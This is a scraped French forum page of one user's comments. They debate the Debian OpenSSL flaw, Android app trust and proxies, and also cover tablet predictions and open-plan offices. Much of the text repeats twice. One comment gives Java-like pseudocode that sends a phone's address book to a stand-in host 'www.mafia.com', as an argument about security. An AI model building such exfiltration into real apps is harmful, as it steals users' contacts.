Plus serieusement, l'ipad va conserver le haut du pave un bout de temps encore. Entre la qualite d'ios et l'experience d'apple dans le domaine, android va mettre du temps a rattraper son retard. Puis android va remonter, et le marche des tablettes sera similaire a celui des smartphones (cf plus bas).
Windows phone va faire un coup a la xbox. Vont mettre des annees a arriver a une place confortable.
L'iphone restera la rolls des telephones, meme si android va bouffer l'essentiel du marche. C'est sur ios que continueront de sortir les innovations et soft cho cho cho, parce que c'est infiniment plus simple a developer pour un marche qui a prouve qu'il n'hesitait pas a acheter des applis/contenu. Android aura les memes softs, mais apres et moins mediatise.
Les macbooks vont probablement continuer a bouffer des parts et se stabiliser vers 25-30% du marche des laptops, probablement seulement pour le marche "particulier". Linux sur le desktop restera confine a ses 2-3%, faut de finition et de support de matos decent.
Tout le monde gueule sur le systeme de souscription d'apple, mais ca va quand meme marcher parce que les editeurs ont le choix entre presque pas vendre ou vendre beaucoup plus en payant la dime et l'obole a apple, ils prendront les thunes, evidemment.
Steve jobs va casser sa pipe et elton john fera une chanson en son honneur, like a candle in the wine.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Parce que baser la sécurité sur une donnée qui peut être tout le temps à zero, si le compilateur décide de toujours mettre à zero la mémoire alloué, et se baser sur une "possible entropie", c'est une putain de faille.
Si le compilateur le decide, oui. Est ce que le compilateur le decide?
Je te demande pas s'il peut le faire, je te demande s'il le fait.
C'est pas "plus sikioure", c'est "autant sikioure".
Faut croire que non, la version officielle arrive a generer plus de 65 000 cles differentes, pas la version debian.
C'est peut etre mal, mais en attendant, ya une version qui marche et l'autre, cense etre plus propre qui marche pas.
Quand tu code comme un goret et que ton code provoque une tonne d'erreur dans des situations classiques de dvp (utilisation de valgrind, ...), faut pas venir pleurer si quelqu'un, en essayant d'enlever les erreurs qui apparaissent, casse quelque chose.
Oui, et quand on fait des patchs a la mord moi le noeud sur un projet critique sans meme les tester et qu'on balance ca en prod a la moitie de la planete, faut pas venir pleurer si qq1 vient faire remarquer que c'est du travail de gougnafier et que c'est irresponsable de rejeter l'erreur sur upstream!
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Ben ils parlent du meilleur systeme ayant jamais existe, je leur fait juste remarque qu'il a ete annonce hier, c'est tout.
/me sifflote.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
C'est genial en fait, ton argument c'est d'une part "les autres vont le faire pour le moi, donc c'est fiable", mais t'as strictement aucune idee de qui va le faire, ou meme si qq1 va le faire (surtout quand les autres disent "les autres vont le faire pour moi, donc c'est fiable"), et d'autre part "si le probleme a pas ete remontes, il n'y a pas de problemes et je peux y aller a fond les ballons", ce qui marche, sauf pour les premiers qui se font couillonner.
Sinon pour open ssl, ca a finit par se voir aussi, le probleme c'est que ca c'est vu tres tard et que pendant 2 ans, debian a genere des cles des bois. Alors, t'as beau dire "on a finit par le voir", les failles de secu dans IE6, on a finit par les voir aussi, ca les rend pas moins grave.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Et pendant que vous vous battez pour savoir qui qu'est le plus fort, Apple sort l'iPad2 et annonce iOS 4.3
/me sifflote
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Serais tu en train d'insinuer que le modele communautaire est plus qu'inadapte pour produire du logiciel de qualite, par manque de resource et de motivation?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Hein?!?
Comment ca ca a rien a voir avec le debat?
T'es en train de nous dire que tu preferes supposer que les relecteurs (imaginaires) vont trouver la faille alors que t'as sous le nez un exemple de faille demesurement grosse, posee juste sous le nez, qui a meme pas ete camouflee, qui a ete trouvee par pur coup de chance (il se trouve que certains ont eu des collisions de cles et ca leur a mit la puce a l'oreille, c'aurait pas ete le cas on saurait potentiellement meme pas au courant du pb a l'heure actuelle) 2 ans apres l'introduction du bug.
C'est ca que "l'experience de tant d'annees" m'a appris, c'est que la disponibilite du source n'apporte pas grand chose en terme de securite concrete. Et aussi que le processus qualite des distros libres est une vaste blague. Et qu'accessoirement Debian a pas ete foutu d'accepter ses responsabilites en accusant OpenSSL de pas avoir relu son patch des bois.
Rien n'est fait, il se trouve que ca marche comme ca et ca m'en touche une sans faire bouger l'autre, mais venir dire "on a le source, si on le lisait on trouverais des failles, mais le passe a prouve que personne le lit" et presenter ca comme une feature de securite, c'est un peu gros tu trouves pas?
L'hypothese de pbpg est pas une hypothese, c'est un fait avere, meme avec le source, on trouve des failles critiques longtemps apres, et elles ont pas ete trouvees en lisant le code...
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Et il te sert a quoi ton proxy si toutes tes applis ont un acces direct a internet?
L'interet du proxy, c'est que si ton OS tente de joindre www.malware.com, le proxy va voir que c'est un domaine interdit et bloquer la requete.
Remettons dans le contexte:
* pbpg: je peux ecrire une appli qui se connecte a mon serveur et chope la chtouille
* JGO: ouais mais eud'facons mon proxy, il bloquera ca
* Moi: et comment tu fais pour mettre un proxy sur un reseau 3g?
* JGO: ouais mais eud'facons, j'ai pas de portable 3g, alors le probleme se pose pas.
Si n'importe quelle appli peut faire URLConnection connection = new URLConnection("http://www.malware.com");
connection.open();
connection.read();
connection.close();
Ou encore URLConnection connection = new URLConnection("http://www.mafia.com");
connection.open();
connection.send(CarnetDadresse);
connection.close();
tout en bypassant allegrement le proxy que t'as mit en dehors de ton reseau (wtf?!?), t'as gagne quoi au juste?
Alors, ok, cool, Firefox va passer par ton proxy, mais a quoi ca t'avances (a part t'emmerder a configurer Firefox pour utiliser un proxy des bois)?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Mais si je préfère supposer que quelqu'un trouvera la faille, comme l'expérience de tant d'années l'a montré ?
Ben si quelqu'un la trouve "par hasard" comme ca a ete le cas avec open ssl troue par debian, ca nous fait une belle jambe...
"Ouais, les gars, vos telephones la. Ouais, ben ils sont plombes, toutes vos donnees personnelles voire confidentielles sont au mains des mechants de la mafia, depuis 2 ans. Mais c'est pas grave, hein, on a trouve la faille!"
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Et comment tu fais pour mettre ton proxy sur le reseau de le reseau de ton operateur?
Le concept du proxy, c'est que c'est physiquement pas possible de sortir du reseau sans passer par lui, ca sert strictement a rien sinon...
Tu fais quoi si une appli ouvre une socket en direct sur www.malware.com?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
T'as beau essayer de noyer le poisson dans du blabla qui n'a rien a voir, tout ca ca m'explique pas comment tu fais pour mettre en place un proxy (enfin, un qui sert a quelque chose) pour ton telephone 3g.
Quand a firefox pour android, c'est cool, mais il est pas encore sorti.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Douleur pour le premier qui trouve qq chose de bizarre.
Ca c'est de la politique de secu "trouve un pov' gars qui s'est fait couillonner avant moi".
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
T'es trop fort!
Mais dans tout ca, tu nous expliques pas comment ca resoud le probleme, tu disais, je cite en substance "ils ont qu'a pas installer n'importe quoi".
Sinon, je voudrais bien savoir quel est ta config proxy (surtout du cote du serveur en fait) sur ton telephone 3g.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Mais alors, au final, le code, il est relu ou pas?
Non parce que du code que personne n'utilise (combien utilisent un open ssl vanilla? serieusement?) soit relu, tres honnetement, ca me fait une belle jambe...
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Non, mais t'as pas compris, en plus de relire le code de ses applis, il audite aussi les flux reseau qui sortent/rentrent de sa machine en temps reel. Har'core, t'as vu?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
C'est quoi ton point alors?
Les utilisateurs doivent auditer eux meme les applis qu'ils installent? (Cf ta remarque plus "ne pas installer n'importe quoi")
Ou qu'ils doivent faire confiance a leur distributeur de confiance? (Ce que tu fais apparement, ce qui voudrait donc dire que soit tu racontais de la merde plus haut, soit tu preconise un "faites ce que je dit, pas ce que je fait"). Si c'est le cas, en concluerais tu donc que Google est responsable de laisser n'importe qui faire n'importe quoi avec sa plateforme?
Parce que la tu viens un peu de faire un virage a 180 degres, meme steve jobs aurait pas fait mieux.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
euh il a demandé si ce qu'il faisait était ok, et il a pas eu de réponse affolée, vu que les gars d'openssl ont dit "ok".
D'une part, ils ont dit "ok pour le debug", d'autre part s'il avait le patch qu'il avait soumit, on en serait pas la.
lire une donnée non initalisée, tu n'as absolument aucune idée de l'entropie de l'aléa
Ouais, alors que lire une donnee initializee a "que des zeros", au moins t'as une tres tres bonne idee de l'entropie de l'alea utilise. C'est achement mieux, et achement plus sikioure!
Autant openssl aurait du coder proprement pour éviter que des gens essaient de corriger leurs saleté.
Ben voyons, encore un peu et ca va etre le mec d'OpenSSL qui a foutu la grouille...
Et evidemment, pas un mot sur le processus de relecture (que ce soit celui de debian ou de la communaute). JGO, comment ca se fait que t'ais pas vu ce code? Tu relis pas le source alors? Et meme si tu l'avais lu d'ailleurs, combien tu paries que t'aurais rien vu du tout?
Mais c'est marrant ca, parce qu'il ya plein de gens ici qui disent qu'avoir le code source permet de trouver les bugs et les failles. Rappelle moi comment ils l'ont trouve ce probleme deja?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Ca fait rever ta procedure, on dirait le service d'audit de mon ancienne boite qui bondissait au plafond quand je choppais la derniere release d'eclipse sortie la veille.
Bon, et sinon, les extensions, c'est une chose, pour les applis natives, tu fais comment? Tu te tapes la lecture de tout le code des applis?
Non, tu fais confiance aux repos. En quelque sorte, le distributeur. Ah ben tiens, interessant, comme google et son store tu veux dire?
OpenSSL est une grosse application à laquelle la plupart des mortels ne comprennent rien, on en est donc réduit à faire confiance au fournisseur (debian).
Ben voyons! Tu sais, meme I'm rich est une application a laquelle la plupart des mortels ne comprennent rien (scoop! la plupart des mortels ne bitent rien au development, c'est du chinois pour eux, meme a un haut niveau), donc les utilisateurs en sont reduits a faire confiance au fournisseur (google et son android market).
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Pour commencer, pour Android comme pour n'importe quel autre système, les gens ne devraient pas installer n'importe quelle application sans refléchir.
Ok, reflechissons.
Oh, une appli qui fait un truc qui m'interesse.
C'est gratuit.
Ah ben elle a des bons ratings en plus.
Pis c'est sur le store google.
Allez, zou, je l'installe.
Tu propose quoi comme reflexion?
Telecharger le code source, le lire, l'auditer, le fuzzer jusqu'a la moelle, puis decompiler le binaire et verifier qu'il correspond au source, puis laisser l'appli tourner 2 mois toute seule pour voir si ya pas une time bomb dedans?
T'en as d'autres des supers reflexions a la con dans le meme style? On parle pas de double cliquer sur anna_kournikova_xxx_pr0m.jpg.exe attache a mail qui vient de russie, mais d'installer une appli qui vient du store officiel de google...
Quand Debian a distribue pendant 2 ans une version plombee d'OpenSSL, ca a ete quoi ta premiere pensee? Faut arreter d'installer n'importe quelle application sans reflechir?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Waou, dingue ca, c'est du jamais vu ce genre de chose dans les forums ou plateformes de blog cette feature de moderation!
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Non, il est parti boire une biere avec pim et poum.
L'astronome est disponible par contre.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Ce monopole de MS, un jour il va s'arreter, une boite va venir et faire quelque chose qui changera la donne.
Apple.
Sauf si Steve calanche avant, ou s'ils se prennent un vilain proces par la FTC.
Ils prendront jamais une part aussi dominante que MS (ne serait ce qu'a cause de leur cible et de leur royale ignorance du marche entreprise), mais chez le particulier, ils commencent a chasser sur les terres de MS.
Bien sur, pendant ce temps les, les linuxiens en seront encore a s'engueuler pour savoir s'il faut accepter tel firmware dans le kernel dont la licence est pas tres clair a cause d'une virgule, de reecrire Pulse ALSOSS Audio v5 (promis, ce coup ci, ca va dechirer, quand tu cliques la... Ca fait pouic!!!) et les pilotes graphiques libres arriveront a faire tourner Doom 2 a 30 fps en 640*480 (bon ca rame un peu sur le boss de fin, mais, he, takacontrib!). Ah, et kde4 sera enfin a peu pres stable, apres avoir perdu 95% de ses utilisateurs (forcement, sans utilisateurs, plus de bug remontes, sont pas cons chez kde!).
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Je suis desole de devoir t'annoncer qu'un support de stockage numerique fiable sur la duree de ta vie et de ta progeniture n'existe tout simplement pas.
Le seul truc qui pourrait le faire, c'est le bon vieux papier et l'encre.
Cote numerique, quoique tu prennes tu auras au choix le probleme de la duree de vie intrinseque du support (dvd qui claque apres 15 ans) ou de l'impossibilite de brancher ton peripherique sur le matos de dans 30 ans, voire les deux (pas convaincu que le dvd/support optique existe encore dans 20 ans).
Rajoute par dessus les problemes de formats de fichier, ce que tu cherches est tout simplement pas possible.
Le mieux que tu puisses faire a l'heure actuelle c'est:
* faire qq chose toi meme et te fader les problemes (verification reguliere de l'integrite des supports + migration vers un nouveau support quand necessaire) et les risques (cafetiere qui tombe, cambriolage, incendie, chat tres jaloux etc.) qui vont avec
* confier ca a des pros dont c'est le boulot, et payer le prix fort.
Ou faire imprimer 15 ans de mails sur du papier/encre de qualite et mettre ca a la banque, dans un coffre.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Oui, ca n'a pas que des avantages, c'est sur.
Cela dit, ce que tu cite releve surtout du "savoir vivre en groupe". Tu sors pas un sandwich camembert/munster/livarot aux aromes releve quand t'es en groupe. C'est pareil dans le train par exemple.
Le mec dans le train, tu peux pas lui dire, quand c'est un collegue, tu lui fais remarquer qu'il ya une cuisine et qu'il peut aller baffrer son casse dalle la bas.
De meme, tu brailles pas dans un espace ouvert quand t'as du monde qui bosse autour.
Autre avantage important, parmi les 3 gars qui discutent sur un truc boulot en se grattant la tete, un quatrieme peut etre assis a cote, avoir la reponse ou un bout de reponse, les entendre en parler et se joindre a la discussion, sans que les autres aient pour autant pense qu'il savait qq chose.
Faut voir la gueule de l'open space apres aussi. J'ai fait des open space mixe "tout le monde ensemble en vrac, sans consideration d'equipe".Les commericaux au telephone toute la journee "Hi, I'm bob from xxx, blablabla" 50 fois par jour ou le chairman qui engueule vertement son comptable parce qu'il s'est gourre quand il a fait ses impots, oui, ca casse les couilles. Son boss/ses collegues directes a qq bureaux de la, ca saoule aussi, c'est beaucoup plus dur de communiquer rapidement sur des petits points minueurs de cette facon.
J'ai fait des open space "par equipe" delimite par des rideaux (style paravent japonais, mais en version gros ridaux de velour). L'open space en question comprend uniquement la team (et toute la team, du product development au pisseur de code avec la qa et le design, soit a la louche 10-15 personnes). Tu te tapes pas le bordel des autres equipes, les rideaux, quand ils sont fermes evitent a ceux des autres equipes de venir nous emmerder, quand ils sont ouvert ca fait comme un gros open space, et ca donne une sensation d'intimite a l'equipe qui renforce la notion de groupe soude.
Avoir toute l'equipe ensemble permet de regler des problemes plus tot que si les business owners sont a l'autre bout du batiment. Devoir cavaler toute la journee pour parler a qq personnes, ca me gave, et non, l'IM ou le telephone ne permet pas toujours de remplacer une discussion physique.
C'est pas simple a amenager, suffit pas de prendre un loft, de lacher 20 bureaux + chaises et roule ma poule.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
Ben il y a Communicator pour ca... Tu peux poser ta question au gars ou qu'il soit : au bureau, en meeting, a la maison, etc... (si il a envie de repondre evidemment)
Ca depend de la question que t'as a poser ca.
Je viens d'aller voir 3 fois le voisin de mon voisin pour des questions a la con sur le format JSON qu'il va recuperer qui auraient ete chiantes a poser par IM.
De la meme facon, t'as parfois besoin de montrer un truc son ton ecran a toi, c'est plus pratique quand le mec est a 2 metres et peut juste rouler sa chaise a ton bureau plutot que de devoir dedocker le laptop/aller le chercher dans son bureau et le faire venir.
Ouaif, c'est idem que les avoir dans le bureau d'a cote au final.
Ben ya une certaine barriere psychologique a avoir des bureaux individuels. T'es plus hesitant a passer voir un gars quand il est dans son bureau individuel plutot qu'assis au milieu d'un groupe.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
# Facile!
Posté par pasScott pasForstall . En réponse au journal Parlons un peu du futur. Évalué à 9.
2012, l'annee du desktop sous linux. 2013 aussi.
Plus serieusement, l'ipad va conserver le haut du pave un bout de temps encore. Entre la qualite d'ios et l'experience d'apple dans le domaine, android va mettre du temps a rattraper son retard. Puis android va remonter, et le marche des tablettes sera similaire a celui des smartphones (cf plus bas).
Windows phone va faire un coup a la xbox. Vont mettre des annees a arriver a une place confortable.
L'iphone restera la rolls des telephones, meme si android va bouffer l'essentiel du marche. C'est sur ios que continueront de sortir les innovations et soft cho cho cho, parce que c'est infiniment plus simple a developer pour un marche qui a prouve qu'il n'hesitait pas a acheter des applis/contenu. Android aura les memes softs, mais apres et moins mediatise.
Les macbooks vont probablement continuer a bouffer des parts et se stabiliser vers 25-30% du marche des laptops, probablement seulement pour le marche "particulier". Linux sur le desktop restera confine a ses 2-3%, faut de finition et de support de matos decent.
Tout le monde gueule sur le systeme de souscription d'apple, mais ca va quand meme marcher parce que les editeurs ont le choix entre presque pas vendre ou vendre beaucoup plus en payant la dime et l'obole a apple, ils prendront les thunes, evidemment.
Steve jobs va casser sa pipe et elton john fera une chanson en son honneur, like a candle in the wine.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à -2.
Si le compilateur le decide, oui. Est ce que le compilateur le decide?
Je te demande pas s'il peut le faire, je te demande s'il le fait.
Faut croire que non, la version officielle arrive a generer plus de 65 000 cles differentes, pas la version debian.
C'est peut etre mal, mais en attendant, ya une version qui marche et l'autre, cense etre plus propre qui marche pas.
Oui, et quand on fait des patchs a la mord moi le noeud sur un projet critique sans meme les tester et qu'on balance ca en prod a la moitie de la planete, faut pas venir pleurer si qq1 vient faire remarquer que c'est du travail de gougnafier et que c'est irresponsable de rejeter l'erreur sur upstream!
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 1.
Ben ils parlent du meilleur systeme ayant jamais existe, je leur fait juste remarque qu'il a ete annonce hier, c'est tout.
/me sifflote.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 3.
C'est genial en fait, ton argument c'est d'une part "les autres vont le faire pour le moi, donc c'est fiable", mais t'as strictement aucune idee de qui va le faire, ou meme si qq1 va le faire (surtout quand les autres disent "les autres vont le faire pour moi, donc c'est fiable"), et d'autre part "si le probleme a pas ete remontes, il n'y a pas de problemes et je peux y aller a fond les ballons", ce qui marche, sauf pour les premiers qui se font couillonner.
Sinon pour open ssl, ca a finit par se voir aussi, le probleme c'est que ca c'est vu tres tard et que pendant 2 ans, debian a genere des cles des bois. Alors, t'as beau dire "on a finit par le voir", les failles de secu dans IE6, on a finit par les voir aussi, ca les rend pas moins grave.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à -4.
Et pendant que vous vous battez pour savoir qui qu'est le plus fort, Apple sort l'iPad2 et annonce iOS 4.3
/me sifflote
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 4.
Serais tu en train d'insinuer que le modele communautaire est plus qu'inadapte pour produire du logiciel de qualite, par manque de resource et de motivation?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 5.
Hein?!?
Comment ca ca a rien a voir avec le debat?
T'es en train de nous dire que tu preferes supposer que les relecteurs (imaginaires) vont trouver la faille alors que t'as sous le nez un exemple de faille demesurement grosse, posee juste sous le nez, qui a meme pas ete camouflee, qui a ete trouvee par pur coup de chance (il se trouve que certains ont eu des collisions de cles et ca leur a mit la puce a l'oreille, c'aurait pas ete le cas on saurait potentiellement meme pas au courant du pb a l'heure actuelle) 2 ans apres l'introduction du bug.
C'est ca que "l'experience de tant d'annees" m'a appris, c'est que la disponibilite du source n'apporte pas grand chose en terme de securite concrete. Et aussi que le processus qualite des distros libres est une vaste blague. Et qu'accessoirement Debian a pas ete foutu d'accepter ses responsabilites en accusant OpenSSL de pas avoir relu son patch des bois.
Rien n'est fait, il se trouve que ca marche comme ca et ca m'en touche une sans faire bouger l'autre, mais venir dire "on a le source, si on le lisait on trouverais des failles, mais le passe a prouve que personne le lit" et presenter ca comme une feature de securite, c'est un peu gros tu trouves pas?
L'hypothese de pbpg est pas une hypothese, c'est un fait avere, meme avec le source, on trouve des failles critiques longtemps apres, et elles ont pas ete trouvees en lisant le code...
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 3.
Et il te sert a quoi ton proxy si toutes tes applis ont un acces direct a internet?
L'interet du proxy, c'est que si ton OS tente de joindre www.malware.com, le proxy va voir que c'est un domaine interdit et bloquer la requete.
Remettons dans le contexte:
* pbpg: je peux ecrire une appli qui se connecte a mon serveur et chope la chtouille
* JGO: ouais mais eud'facons mon proxy, il bloquera ca
* Moi: et comment tu fais pour mettre un proxy sur un reseau 3g?
* JGO: ouais mais eud'facons, j'ai pas de portable 3g, alors le probleme se pose pas.
Si n'importe quelle appli peut faire
URLConnection connection = new URLConnection("http://www.malware.com"); connection.open(); connection.read(); connection.close();Ou encore
URLConnection connection = new URLConnection("http://www.mafia.com"); connection.open(); connection.send(CarnetDadresse); connection.close();tout en bypassant allegrement le proxy que t'as mit en dehors de ton reseau (wtf?!?), t'as gagne quoi au juste?
Alors, ok, cool, Firefox va passer par ton proxy, mais a quoi ca t'avances (a part t'emmerder a configurer Firefox pour utiliser un proxy des bois)?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 3.
Ben si quelqu'un la trouve "par hasard" comme ca a ete le cas avec open ssl troue par debian, ca nous fait une belle jambe...
"Ouais, les gars, vos telephones la. Ouais, ben ils sont plombes, toutes vos donnees personnelles voire confidentielles sont au mains des mechants de la mafia, depuis 2 ans. Mais c'est pas grave, hein, on a trouve la faille!"
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à -3.
Et comment tu fais pour mettre ton proxy sur le reseau de le reseau de ton operateur?
Le concept du proxy, c'est que c'est physiquement pas possible de sortir du reseau sans passer par lui, ca sert strictement a rien sinon...
Tu fais quoi si une appli ouvre une socket en direct sur www.malware.com?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 0.
T'as beau essayer de noyer le poisson dans du blabla qui n'a rien a voir, tout ca ca m'explique pas comment tu fais pour mettre en place un proxy (enfin, un qui sert a quelque chose) pour ton telephone 3g.
Quand a firefox pour android, c'est cool, mais il est pas encore sorti.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 1.
Douleur pour le premier qui trouve qq chose de bizarre.
Ca c'est de la politique de secu "trouve un pov' gars qui s'est fait couillonner avant moi".
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 2.
T'es trop fort!
Mais dans tout ca, tu nous expliques pas comment ca resoud le probleme, tu disais, je cite en substance "ils ont qu'a pas installer n'importe quoi".
Sinon, je voudrais bien savoir quel est ta config proxy (surtout du cote du serveur en fait) sur ton telephone 3g.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à -1.
Mais alors, au final, le code, il est relu ou pas?
Non parce que du code que personne n'utilise (combien utilisent un open ssl vanilla? serieusement?) soit relu, tres honnetement, ca me fait une belle jambe...
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 1.
Non, mais t'as pas compris, en plus de relire le code de ses applis, il audite aussi les flux reseau qui sortent/rentrent de sa machine en temps reel. Har'core, t'as vu?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 2.
C'est quoi ton point alors?
Les utilisateurs doivent auditer eux meme les applis qu'ils installent? (Cf ta remarque plus "ne pas installer n'importe quoi")
Ou qu'ils doivent faire confiance a leur distributeur de confiance? (Ce que tu fais apparement, ce qui voudrait donc dire que soit tu racontais de la merde plus haut, soit tu preconise un "faites ce que je dit, pas ce que je fait"). Si c'est le cas, en concluerais tu donc que Google est responsable de laisser n'importe qui faire n'importe quoi avec sa plateforme?
Parce que la tu viens un peu de faire un virage a 180 degres, meme steve jobs aurait pas fait mieux.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 2.
D'une part, ils ont dit "ok pour le debug", d'autre part s'il avait le patch qu'il avait soumit, on en serait pas la.
Ouais, alors que lire une donnee initializee a "que des zeros", au moins t'as une tres tres bonne idee de l'entropie de l'alea utilise. C'est achement mieux, et achement plus sikioure!
Ben voyons, encore un peu et ca va etre le mec d'OpenSSL qui a foutu la grouille...
Et evidemment, pas un mot sur le processus de relecture (que ce soit celui de debian ou de la communaute). JGO, comment ca se fait que t'ais pas vu ce code? Tu relis pas le source alors? Et meme si tu l'avais lu d'ailleurs, combien tu paries que t'aurais rien vu du tout?
Mais c'est marrant ca, parce qu'il ya plein de gens ici qui disent qu'avoir le code source permet de trouver les bugs et les failles. Rappelle moi comment ils l'ont trouve ce probleme deja?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 3.
Ca fait rever ta procedure, on dirait le service d'audit de mon ancienne boite qui bondissait au plafond quand je choppais la derniere release d'eclipse sortie la veille.
Bon, et sinon, les extensions, c'est une chose, pour les applis natives, tu fais comment? Tu te tapes la lecture de tout le code des applis?
Non, tu fais confiance aux repos. En quelque sorte, le distributeur. Ah ben tiens, interessant, comme google et son store tu veux dire?
Ben voyons! Tu sais, meme I'm rich est une application a laquelle la plupart des mortels ne comprennent rien (scoop! la plupart des mortels ne bitent rien au development, c'est du chinois pour eux, meme a un haut niveau), donc les utilisateurs en sont reduits a faire confiance au fournisseur (google et son android market).
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Solution libre
Posté par pasScott pasForstall . En réponse au journal Avec Android, vous en avez plus pour votre argent. Évalué à 9.
Ok, reflechissons.
Oh, une appli qui fait un truc qui m'interesse.
C'est gratuit.
Ah ben elle a des bons ratings en plus.
Pis c'est sur le store google.
Allez, zou, je l'installe.
Tu propose quoi comme reflexion?
